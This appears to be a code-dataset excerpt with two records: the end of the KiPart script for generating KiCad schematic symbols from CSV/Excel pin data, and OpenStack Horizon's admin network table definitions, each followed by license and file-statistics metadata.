# Translate AL to AR. translate_x += box_width translate_y -= box_height elif side == "bottom": # Translate AL to AB translate_y -= box_height elif side == "top": # Translate AL to AT translate_x += box_width # Create the complete transformation matrix = rotation followed by translation. transform[side] = ( Affine.translation(translate_x, translate_y) * transform[side] ) # Also translate the point on each side that defines the box around the symbol. box_pt[side] = transform[side] * box_pt[side] # Draw the transformed pins for each side of the symbol. for side, side_pins in list(unit.items()): # If the pins are ordered by their row in the spreadsheet or by their name, # then reverse their order on the right and top sides so they go from top-to-bottom # on the right side and left-to-right on the top side instead of the opposite # as happens with counter-clockwise pin-number ordering. side_reverse = reverse if sort_type in ["name", "row"] and side in ["right", "top"]: side_reverse = not reverse # Sort the pins for the desired order: row-wise, numeric (pin #), alphabetical (pin name). sorted_side_pins = sorted( list(side_pins.items()), key=pin_key_func, reverse=side_reverse ) # Draw the transformed pins for this side of the symbol. part_defn += draw_pins( unit_num, sorted_side_pins, bbox[side], transform[side], side, push, fuzzy_match ) # Create the box around the unit's pins. part_defn += BOX.format( x0=int(box_pt["left"][X]), y0=int(box_pt["top"][Y]), x1=int(box_pt["right"][X]), y1=int(box_pt["bottom"][Y]), unit_num=unit_num, line_width=box_line_width, fill=BOX_FILLS[fill], ) # Close the section that holds the part's units. part_defn += END_DRAW # Close the part definition. part_defn += END_DEF # Return complete part symbol definition. return part_defn def is_pwr(pin, fuzzy_match): """Return true if this is a power input pin.""" return ( find_closest_match(name=pin.type, name_dict=PIN_TYPES, fuzzy_match=fuzzy_match) == "W" ) def do_bundling(pin_data, bundle, fuzzy_match): """Handle bundling for power pins. Unbundle everything else.""" for unit in list(pin_data.values()): for side in list(unit.values()): for name, pins in list(side.items()): if len(pins) > 1: for index, p in enumerate(pins): if is_pwr(p, fuzzy_match) and bundle: side[p.name + "_pwr"].append(p) else: side[p.name + "_" + str(index)].append(p) del side[name] def scan_for_readers(): """Look for scripts for reading part description files.""" trailer = "_reader.py" # Reader file names always end with this. readers = {} for dir in [os.path.dirname(os.path.abspath(__file__)), "."]: for f in os.listdir(dir): if f.endswith(trailer): reader_name = f.replace(trailer, "") readers[reader_name] = dir return readers def kipart( part_reader, part_data_file, part_data_file_name, part_data_file_type, parts_lib, fill, box_line_width, push, allow_overwrite=False, sort_type="name", reverse=False, fuzzy_match=False, bundle=False, debug_level=0, ): """Read part pin data from a CSV/text/Excel file and write or append it to a library file.""" # Get the part number and pin data from the CSV file. for ( part_num, part_ref_prefix, part_footprint, part_manf_num, part_datasheet, part_desc, pin_data, ) in part_reader(part_data_file, part_data_file_name, part_data_file_type): # Handle retaining/overwriting parts that are already in the library. if parts_lib.get(part_num): if allow_overwrite: print("Overwriting part {}!".format(part_num)) else: print("Retaining previous definition of part {}.".format(part_num)) continue do_bundling(pin_data, bundle, fuzzy_match) # Draw the schematic symbol into the library. parts_lib[part_num] = draw_symbol( part_num=part_num, part_ref_prefix=part_ref_prefix, part_footprint=part_footprint, part_manf_num=part_manf_num, part_datasheet=part_datasheet, part_desc=part_desc, pin_data=pin_data, sort_type=sort_type, reverse=reverse, fuzzy_match=fuzzy_match, fill=fill, box_line_width=box_line_width, push=push, ) def read_lib_file(lib_file): parts_lib = OrderedDict() with open(lib_file, "r") as lib: part_def = "" for line in lib: start = re.match("DEF (?P<part_name>\S+)", line) end = re.match("ENDDEF$", line) if start: part_def = line part_name = start.group("part_name") elif end: part_def += line parts_lib[part_name] = part_def else: part_def += line return parts_lib def write_lib_file(parts_lib, lib_file): print("Writing", lib_file, len(parts_lib)) LIB_HEADER = "EESchema-LIBRARY Version 2.3\n" with open(lib_file, "w") as lib_fp: lib_fp.write(LIB_HEADER) for part_def in parts_lib.values(): lib_fp.write(part_def) def call_kipart(args, part_reader, part_data_file, file_name, file_type, parts_lib): """Helper routine for calling kipart from main().""" return kipart( part_reader=part_reader, part_data_file=part_data_file, part_data_file_name=file_name, part_data_file_type=file_type, parts_lib=parts_lib, fill=args.fill, box_line_width=args.box_line_width, push=args.push, allow_overwrite=args.overwrite, sort_type=args.sort, reverse=args.reverse, fuzzy_match=args.fuzzy_match, bundle=args.bundle, debug_level=args.debug, ) def main(): # Get Python routines for reading part description/CSV files. readers = scan_for_readers() parser = ap.ArgumentParser( description="Generate single & multi-unit schematic symbols for KiCad from a CSV file." ) parser.add_argument( "-v", "--version", action="version", version="KiPart " + __version__ ) parser.add_argument( "input_files", nargs="+", type=str, metavar="file.[csv|txt|xlsx|zip]", help="Files for parts in CSV/text/Excel format or as such files in .zip archives.", ) parser.add_argument( "-r", "--reader", nargs="?", type=lambda s: unicode(s).lower(), choices=readers.keys(), default="generic", help="Name of function for reading the CSV or part description files.", ) parser.add_argument( "-s", "--sort", nargs="?", # type=str.lower, type=lambda s: unicode(s).lower(), choices=["row", "num", "name"], default="row", help="Sort the part pins by their entry order in the CSV file, their pin number, or their pin name.", ) parser.add_argument( "--reverse", action="store_true", help="Sort pins in reverse order." ) parser.add_argument( "--side", nargs="?", # type=str.lower, type=lambda s: unicode(s).lower(), choices=["left", "right", "top", "bottom"], default="left", help="Which side to place the pins by default.", ) parser.add_argument( "--fill", nargs="?", type=lambda s: unicode(s).lower(), choices=BOX_FILLS.keys(), default=DEFAULT_BOX_FILL, help="Select fill style for schematic symbol boxes.", ) parser.add_argument( "--box_line_width", type=int, default=DEFAULT_BOX_LINE_WIDTH, help="Set line width of the schematic symbol box.", ) parser.add_argument( "--push", type=float, default=0.5, help="Push pins left/up (0.0), center (0.5), or right/down(1.0) on the sides of the schematic symbol box." ) parser.add_argument( "-o", "--output", nargs="?", type=str, metavar="file.lib", help="Generated KiCad symbol library for parts.", ) parser.add_argument( "-f", "--fuzzy_match", action="store_true", help="Use approximate string matching when looking-up the pin type, style and orientation.", ) parser.add_argument( "-b", "--bundle", action="store_true", help="Bundle multiple, identically-named power and ground pins each into a single schematic pin.", ) parser.add_argument( "-a", "--append", "--add", action="store_true", help="Add parts to an existing part library. Overwrite existing parts only if used in conjunction with -w.", ) parser.add_argument( "-w", "--overwrite", action="store_true", help="Allow overwriting of an existing part library.", ) parser.add_argument( "-d", "--debug", nargs="?", type=int, default=0, metavar="LEVEL", help="Print debugging info. (Larger LEVEL means more info.)", ) args = parser.parse_args() # kipart f1.csv f2.csv # Create f1.lib, f2.lib # kipart f1.csv f2.csv -w # Overwrite f1.lib, f2.lib # kipart f1.csv f2.csv -a # Append to f1.lib, f2.lib # kipart f1.csv f2.csv -o f.lib # Create f.lib # kipart f1.csv f2.csv -w -o f.lib # Overwrite f.lib # kipart f1.csv f2.csv -a -o f.lib # Append to f.lib # Load the function for reading the part description file. part_reader_name = args.reader + "_reader" # Name of the reader module. reader_dir = readers[args.reader] sys.path.append(reader_dir) # Import from dir where the reader is if reader_dir == ".": importlib.import_module(part_reader_name) # Import module. reader_module = sys.modules[part_reader_name] # Get imported module. else: importlib.import_module("kipart." + part_reader_name) # Import module. reader_module = sys.modules[ "kipart." + part_reader_name ] # Get imported module. part_reader = getattr(reader_module, part_reader_name) # Get reader function. DEFAULT_PIN.side = args.side check_file_exists = True # Used to check for existence of a single output lib file. for input_file in args.input_files: # No explicit output lib file, so each individual input file will generate its own .lib file. if check_file_exists or not args.output: output_file = args.output or os.path.splitext(input_file)[0] + ".lib" if os.path.isfile(output_file): # The output lib file already exists. if args.overwrite: # Overwriting an existing file, so ignore the existing parts. parts_lib = OrderedDict() elif args.append: # Appending to an existing file, so read in existing parts. parts_lib = read_lib_file(output_file) else: print( "Output file {} already exists! Use the --overwrite option to replace it or the --append option to append to it.".format( output_file ) ) sys.exit(1) else: # Lib file doesn't exist, so create a new lib file starting with no parts. parts_lib = OrderedDict() # Don't setup the output lib file again if -o option was used to specify a single output lib. check_file_exists = not args.output file_ext = os.path.splitext(input_file)[-1].lower() # Get input file extension. if file_ext == ".zip": # Process the individual files inside a ZIP archive. with zipfile.ZipFile(input_file, "r") as zip_file: for zipped_file in zip_file.infolist(): zip_file_ext = os.path.splitext(zipped_file.filename)[-1] if zip_file_ext in [".csv", ".txt"]: # Only process CSV, TXT, Excel files in the archive. with zip_file.open(zipped_file, "r") as part_data_file: part_data_file = io.TextIOWrapper(part_data_file) call_kipart( args, part_reader, part_data_file, zipped_file.filename, zip_file_ext, parts_lib, ) elif zip_file_ext in [".xlsx"]: xlsx_data = zip_file.read(zipped_file) part_data_file = io.BytesIO(xlsx_data) call_kipart( args, part_reader, part_data_file, zipped_file.filename, zip_file_ext, parts_lib, ) else: # Skip unrecognized files. continue elif file_ext in [".csv", ".txt"]: # Process CSV and TXT files. with open(input_file, "r") as part_data_file: call_kipart( args, part_reader, part_data_file, input_file, file_ext, parts_lib ) elif file_ext in [".xlsx"]: # Process Excel files. with open(input_file, "rb") as part_data_file: call_kipart( args, part_reader, part_data_file, input_file, file_ext, parts_lib ) else: # Skip unrecognized files. continue if not args.output: # No global output lib file, so output a lib file for each input file. write_lib_file(parts_lib, output_file) if args.output: # Only a single lib output file was given, so write library to it after all # the input files were processed. write_lib_file(parts_lib, output_file) # main entrypoint. if __name__ == "__main__": main()
mit
7,613,360,735,598,875,000
34.217006
145
0.558249
false
3.551268
false
false
false
yeming233/horizon
openstack_dashboard/dashboards/admin/networks/tables.py
1
5042
# Copyright 2012 NEC Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import logging from django.core.urlresolvers import reverse from django.template import defaultfilters as filters from django.utils.translation import pgettext_lazy from django.utils.translation import ugettext_lazy as _ from django.utils.translation import ungettext_lazy from horizon import exceptions from horizon import tables from openstack_dashboard import api from openstack_dashboard.dashboards.project.networks \ import tables as project_tables from openstack_dashboard import policy LOG = logging.getLogger(__name__) class DeleteNetwork(policy.PolicyTargetMixin, tables.DeleteAction): @staticmethod def action_present(count): return ungettext_lazy( u"Delete Network", u"Delete Networks", count ) @staticmethod def action_past(count): return ungettext_lazy( u"Deleted Network", u"Deleted Networks", count ) policy_rules = (("network", "delete_network"),) def delete(self, request, obj_id): try: api.neutron.network_delete(request, obj_id) except Exception as e: LOG.info('Failed to delete network %(id)s: %(exc)s', {'id': obj_id, 'exc': e}) msg = _('Failed to delete network %s') % obj_id redirect = reverse('horizon:admin:networks:index') exceptions.handle(request, msg, redirect=redirect) class CreateNetwork(tables.LinkAction): name = "create" verbose_name = _("Create Network") url = "horizon:admin:networks:create" classes = ("ajax-modal",) icon = "plus" policy_rules = (("network", "create_network"),) class EditNetwork(policy.PolicyTargetMixin, tables.LinkAction): name = "update" verbose_name = _("Edit Network") url = "horizon:admin:networks:update" classes = ("ajax-modal",) icon = "pencil" policy_rules = (("network", "update_network"),) DISPLAY_CHOICES = ( ("up", pgettext_lazy("Admin state of a Network", u"UP")), ("down", pgettext_lazy("Admin state of a Network", u"DOWN")), ) class AdminNetworksFilterAction(project_tables.ProjectNetworksFilterAction): name = "filter_admin_networks" filter_choices = (('project', _("Project ="), True),) +\ project_tables.ProjectNetworksFilterAction.filter_choices class NetworksTable(tables.DataTable): tenant = tables.Column("tenant_name", verbose_name=_("Project")) name = tables.WrappingColumn("name_or_id", verbose_name=_("Network Name"), link='horizon:admin:networks:detail') subnets = tables.Column(project_tables.get_subnets, verbose_name=_("Subnets Associated"),) num_agents = tables.Column("num_agents", verbose_name=_("DHCP Agents")) shared = tables.Column("shared", verbose_name=_("Shared"), filters=(filters.yesno, filters.capfirst)) external = tables.Column("router:external", verbose_name=_("External"), filters=(filters.yesno, filters.capfirst)) status = tables.Column( "status", verbose_name=_("Status"), display_choices=project_tables.STATUS_DISPLAY_CHOICES) admin_state = tables.Column("admin_state", verbose_name=_("Admin State"), display_choices=DISPLAY_CHOICES) def get_object_display(self, network): return network.name_or_id class Meta(object): name = "networks" verbose_name = _("Networks") table_actions = (CreateNetwork, DeleteNetwork, AdminNetworksFilterAction) row_actions = (EditNetwork, DeleteNetwork) def __init__(self, request, data=None, needs_form_wrapper=None, **kwargs): super(NetworksTable, self).__init__( request, data=data, needs_form_wrapper=needs_form_wrapper, **kwargs) try: if not api.neutron.is_extension_supported(request, 'dhcp_agent_scheduler'): del self.columns['num_agents'] except Exception: msg = _("Unable to check if DHCP agent scheduler " "extension is supported") exceptions.handle(self.request, msg) del self.columns['num_agents']
apache-2.0
-2,542,113,935,013,305,300
35.80292
78
0.62138
false
4.411199
false
false
false